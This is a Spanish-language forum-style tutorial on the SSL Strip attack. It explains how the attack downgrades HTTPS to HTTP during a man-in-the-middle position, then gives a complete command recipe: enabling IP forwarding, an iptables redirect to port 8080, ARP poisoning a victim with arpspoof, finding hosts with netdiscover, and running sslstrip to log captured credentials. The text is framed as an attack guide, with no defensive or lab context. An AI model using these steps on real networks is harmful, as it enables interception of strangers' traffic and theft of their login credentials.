La definición de SSL Strip es variada, intentemos acercarnos a la realidad práctica que es lo que más nos puede interesar. SSL Strip consiste en hacer creer al usuario que está bajo una conexión segura, ya sea porque el usuario ve un candadito que indica seguridad, sslstrip puede falsificarlo, o por que el usuario no se fija si está bajo tráfico cifrado o no.

Cuando un atacante lanza SSL Strip sobre una víctima, ésta sigue navegando felizmente por la red. El problema viene cuando se conecta a una página bajo HTTPS, la víctima puede observar como el HTTPS ha desaparecido de su navegador, si no se fija en ese pequeño detalle y se autentifique en algún sitio, sus credenciales irán en texto plano hacia la víctima.

Para que se vea lo que ocurre realmente se explica a continuación, el recuadro con SSL Strip es el atacante realizando un MiTM. El browser de la víctima realizará una petición que el atacante interceptará, entonces SSL Strip realizará la petición correcta al web server, y la respuesta al navegador de la víctima se envía bajo HTTP y no bajo HTTPS. Se observa que SSL Strip aprovecha el paso de HTTP a HTTPS para realizar sus fechorías.[/align


Herramientas

[*] Backtrack o cualquier otra distro



[*]Python apt-get install python



[*]Modulo twisted-web apt-get install python-twisted-web



[*]Ssltrip(backtrack ya lo trae)
Descarga http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz


Instalacion sslstrip

tar zxvf sslstrip-0.9.tar.gz

cd sslstrip-0.9

(optional)python ./setup.py install

Activar Forwarding

echo "1" > /proc/sys/net/ipv4/ip_forward

Comprobar
cat /proc/sys/net/ipv4/ip_forward
*Tiene que aparecer un 1

Redireccionar Trafico

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Envenenamiento(arpspoof)
arpspoof -i [interface] -t [direccion mac victima] [direcc router]

Ejemplo: arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1

Para saber los computadores en la red se puede hacer:

Ejemplos:
netdiscover -i wlan0 -r 192.168.0.1/24
netdiscover -i eth0 -r 192.168.1.1/24

El wlan0 lo reemplazan por su iface, puede ser eth0(en caso de que esten conectados por cable) wlan0 wlan1 etc



Lanzar sslstrip
sslstrip -w cap -l 8080

Eso es todo, y para ver la captura cat cap o buscan el archivo de texto como quieran